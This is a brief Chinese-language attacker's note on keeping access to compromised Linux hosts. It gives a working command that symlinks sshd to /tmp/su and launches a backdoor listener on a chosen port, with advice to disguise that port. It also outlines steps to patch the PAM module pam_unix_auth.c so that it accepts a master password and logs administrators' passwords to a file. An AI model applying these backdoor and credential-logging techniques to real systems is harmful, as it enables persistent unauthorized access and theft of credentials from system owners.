Linux权限维持

SSH 后门

软链接sshd

目标主机建立软连接：

ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=1189

#端口可以任意指定，最好伪装一下

查看端口：

netstat -anlp|grep 1189

攻击机ssh登录：

ssh [email protected] -p 1189

#如果root用户被禁止登陆时，可以利用其他存在的用户身份登陆

具体原理：https://www.cnblogs.com/likaiming/p/11007919.html

Linux PAM密码记录后门

       PAM(Pluggable Authentication Modules)，是由Sun提出的一种认证机制。它通过一共一些动态链接库和一套统一的API，将系统提供的服务和该服务的认证方式分开，使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序，同时也便于向系统中添加新的认证手段。

这种后门主要是通过pam_unix_auth.c打补丁的方式潜入到正常的pam模块中，以此来记录管理员的账号密码。其大致流程如下：

1.获取目标系统所使用的PAM版本，下载对应版本的pam版本
2.解压缩，修改pam_unix_auth.c文件，添加万能密码
3.编译安装PAM
4.编译完后的文件在：modules/pam_unix/.libs/pam_unix.so，复制到/lib64/security中进行替换，即可使用万能密码登陆，并将用户名密码记录到文件中。

参考：

Linux-PAM后门

其他方法请参考：

第4篇：Linux权限维持--后门篇 · 应急响应实战笔记

Linux 下的权限维持 - V4ler1an